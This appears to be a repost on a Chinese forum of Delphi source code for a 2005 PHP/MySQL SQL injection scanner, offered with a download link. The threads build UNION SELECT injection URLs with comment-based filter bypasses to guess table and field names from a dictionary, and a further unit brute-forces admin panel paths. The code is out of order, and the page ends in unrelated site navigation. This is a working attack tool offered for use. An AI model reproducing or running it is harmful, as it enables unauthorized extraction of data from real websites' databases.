nbsp; begin FState :=True; FMemo.Lines.Add(''''''''); FMemo.Lines.Add(''''字段数目猜解结束!共找到''''+IntToStr(i)+''''个字段。''''); Form1.EdtFieldNum.Text :=IntToStr(i); Form1.spNum.MaxValue :=i; Form1.spNum.Text :=IntToStr(i); Form1.spField1.MaxValue :=i; Form1.spField2.MaxValue :=i; exit; end; end; end;
constructor scanTableThread.Create(Url,Str,KeyWord:String;Memo:TMemo;ListView:TListView); begin FListView :=ListView; FMemo :=Memo; FUrl :=Url; FKeyWord :=KeyWord; FStr :=Str; FreeOnTerminate := True; // 自动删除 InitializeCriticalSection(CS); //初始化临界区 //inherited Create(FUrl,FKeyWord,FMemo); // 直接运行 inherited Create(False); end;
procedure scanTableThread.scanTableResult; begin with FListView.Items.Add do begin Caption :=IntToStr(FListView.Items.Count); SubItems.Add(FValue); end; end;
//在一个线程内完成表段猜解工作 procedure scanTableThread.Execute; var i:integer; begin stoped :=False; with Form1 do begin pg1.Min :=0; pg1.Max :=Form1.lsbDict.Count; pg1.Step :=1; pg1.Position :=0; pg1.Visible :=true; end; EnterCriticalSection(cs); //进入临界区 FMemo.Lines.Add(''''''''); FMemo.Lines.Add(''''开始猜解表段。。。''''); FMemo.Lines.Add(''''''''); for i:=0 to Form1.lsbDict.Count-1 do begin if stoped then begin FMemo.Lines.Add(''''''''); FMemo.Lines.Add(''''表段猜解结束。。。''''); Form1.pg1.Visible :=False; exit; end; FValue :=Form1.lsbDict.Items; if FValue='''''''' then Continue; InjUrl :=FUrl+''''/**/and/**/1=1/**/union/**/select/**/''''+FStr+''''/**/from/**/''''+FValue+''''/*''''; FMemo.Lines.Add(InjUrl); Form1.pg1.StepIt; if Get(InjUrl,FKeyWord) then begin Synchronize(scanTableResult); //同步 end; end; FMemo.Lines.Add(''''''''); FMemo.Lines.Add(''''表段猜解结束。。。''''); Form1.pg1.Visible :=False; LeaveCriticalSection(CS); //退出临界区 sleep(20); // 线程挂起; end;
//创建多个线程完成字段猜解 constructor scanFieldThread.Create(Url,Str,KeyWord,Table:String;Num:integer;Memo:TMemo;ListView:TListView); begin FListView :=ListView; FMemo :=Memo; FUrl :=Url; FKeyWord :=KeyWord; FStr :=Str; FTable :=Table; FNum :=Num; FreeOnTerminate := True; // 自动删除 InitializeCriticalSection(CS); //初始化临界区 //inherited Create(FUrl,FKeyWord,FMemo); // 直接运行 inherited Create(False); end;
procedure scanFieldThread.scanFieldResult; begin with FListView.Items.Add do begin Caption :=IntToStr(FListView.Items.Count); SubItems.Add(FValue); end; end;
procedure scanFieldThread.Execute; var i:integer; TmpStr:string; begin FValue :=Form1.lsbDict.Items[FNum]; TmpStr :=StringReplace(FStr,''''&FIELDNAME&'''',FValue,[rfIgnoreCase]); InjUrl:=FUrl+''''/**/and/**/1=1/**/union/**/select/**/''''+TmpStr+''''/**/from/**/''''+FTable+''''/*''''; EnterCriticalSection(cs); //进入临界区 FMemo.Lines.Add(InjUrl); if Get(InjUrl,FKeyWord) then begin Synchronize(scanFieldResult); //同步 end; LeaveCriticalSection(CS); //退出临界区 sleep(20); // 线程挂起; end;
end.
//后台管理扫描线程类 unit Unit3;
interface
uses Classes,StdCtrls,Windows,SysUtils,ComCtrls,wininet;
var CS:TRTLCriticalSection; //定义全局临界区
type scanManagerThread = class(TThread) private Tmplbx :TListBox; TmpMemo :TMemo; TmpNum :integer; TmpUrl :string; Str :string; procedure scanResult; protected procedure Execute; override; public constructor Create(Url:string; Num: integer;Lbx: TListBox;Memo:TMemo); end;
implementation
uses Unit1;
constructor scanManagerThread.Create(Url:string; Num: integer;Lbx: TListBox;Memo:TMemo); begin TmpUrl :=Url; TmpNum :=Num; // 传递参数 Tmplbx :=Lbx; TmpMemo :=Memo; FreeOnTerminate :=True; // 自动删除 InitializeCriticalSection(CS); //初始化临界区 inherited Create(False); // 直接运行 end;
//====================== 判断网址是否存在的函数 ======================= function CheckUrl(url: string; TimeOut: integer = 5000): boolean; var hSession, hfile, hRequest: hInternet; dwindex, dwcodelen: dword; dwcode: array[1..20] of char; res: pchar; re: integer; Err1: integer; j: integer; begin if pos(''''http://'''', lowercase(url)) = 0 then url := ''''http://'''' + url; Result := false; InternetSetOption(hSession, Internet_OPTION_CONNECT_TIMEOUT, @TimeOut, 4); hSession := InternetOpen(''''Mozilla/4.0'''', INTERNET_OPEN_TYPE_PRECONFIG, nil, nil, 0); //设置超时 if assigned(hsession) then begin j := 1; while true do begin hfile := InternetOpenUrl(hsession, pchar(url), nil, 0, INTERNET_FLAG_RELOAD, 0); if hfile = nil then begin j := j + 1; Err1 := GetLastError; if j > 5 then break; if (Err1 <> 12002) or (Err1 <> 12152) then break; sleep(2); end else begin break; end; end; dwIndex := 0; dwCodeLen := 10; HttpQueryInfo(hfile, HTTP_QUERY_STATUS_CODE, @dwcode, dwcodeLen, dwIndex); res := pchar(@dwcode); re := strtointdef(res, 404); case re of 400..450: result := false; else result := true; end; if assigned(hfile) then InternetCloseHandle(hfile); InternetCloseHandle(hsession); end; end;
function GetBackSpaceCount(str:string):string; var i,iCount:integer; begin iCount :=50-length(str); for i:=0 to iCount-1 do begin Result :=Result+'''' ''''; end; end;
procedure scanManagerThread.scanResult; begin Tmplbx.Items.Add(str); Form1.GroupBox1.Caption :=''''检测结果:共找到''''+inttostr(Tmplbx.Items.Count)+''''条路径''''; end;
procedure scanManagerThread.Execute; begin Str :=TmpUrl + Form1.lsbDict.Items[TmpNum]; EnterCriticalSection(cs); //进入临界区 TmpMemo.Lines.Add(Str); if CheckUrl(Str) then begin Synchronize(scanResult); // 同步 end; LeaveCriticalSection(CS); //退出临界区 //sleep(20); // 线程挂起; end;
end.
简介:PHP+MYSQL网站注入扫描工具,针对类似夜猫文章下 载系统比较有效,界面是仿教程的hdsi中的PHP注入模块写 的,实现原理是参考angel的SQL Injection with MYSQL 写的,网上有很多,不再细说。 界面截图:http://www.wrsky.com/attachment/3_1891.jpg 源码下载:http://downloads.2ccc.com/general/internet_lan/PHPInj.rar
Author: hnxyy QQ: 19026695 Date: 2005/5/25
FireFox技术交流论坛 http://www.wrsky.com It is all beginnings free It is all ruin to be privately owned 使用D7编写,界面比较难看,和教主的工具对比了一下,感觉比他的工作扫描速度要快很多
主要单元代码:
unit Unit1;
interface
uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, Spin, StdCtrls, ComCtrls, Buttons, ExtCtrls, IDHTTP, unit2, Unit3, OleCtrls, SHDocVw;
type TForm1 = class(TForm) Panel8: TPanel; Label15: TLabel; Label16: TLabel; Label17: TLabel; EdtInjUrl: TEdit; EdtKey: TEdit; EdtFieldNum: TEdit; rdbNum: TRadioButton; rdbChar: TRadioButton; Panel1: TPanel; pcPHPInj: TPageControl; TabSheet1: TTabSheet; sbscan1: TSpeedButton; sbstop1: TSpeedButton; sbscan2: TSpeedButton; sbstop2: TSpeedButton; Panel15: TPanel; GroupBox5: TGroupBox; lvTable: TListView; GroupBox6: TGroupBox; lvField: TListView; TabSheet2: TTabSheet; GroupBox7: TGroupBox; Label18: TLabel; Label19: TLabel; Label20: TLabel; Label21: TLabel; spField1: TSpinEdit; spField2: TSpinEdit; EdtField1: TEdit; EdtField2: TEdit; EdtTable: TEdit; EdtID: TEdit; GroupBox8: TGroupBox; Label22: TLabel; EdtFileName: TEdit; sbrecord: TSpeedButton; sbfile: TSpeedButton; MM: TMemo; sbscan: TSpeedButton; TabSheet3: TTabSheet; lsbDict: TListBox; TabSheet4: TTabSheet; wb: TWebBrowser; spNum: TSpinEdit; GroupBox1: TGroupBox; sbscan3: TSpeedButton; sbstop3: TSpeedButton; ListBox1: TListBox; TabSheet5: TTabSheet; MMAbout: TMemo; StatusBar1: TStatusBar; procedure sbscanClick(Sender: TObject); procedure sbstop1Click(Sender: TObject); procedure sbscan1Click(Sender: TObject); procedure sbscan2Click(Sender: TObject); procedure lvFieldClick(Sender: TObject); pro 上一页 [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] ... 下一页 >> [MySql]PHP存取 Mysql 数据乱码终极解决方案 [MySql]解决Table xxx is marked as crashed and should … [MySql][MySQL]快速解决"is marked as crashed and shoul… [MySql]MySQL DELETE语法用法详解 [MySql]mysql中时间日期格式化 [MySql]修改mysql导入文件大小限制 [其他]MySql常用命令大全 [Web开发]把ACCESS的数据导入到Mysql中的方法详解 [MySql]解决mysql 1040错误Too many connections的方法 [系统软件]利用crontab系统每天定时备份MySQL数据库
|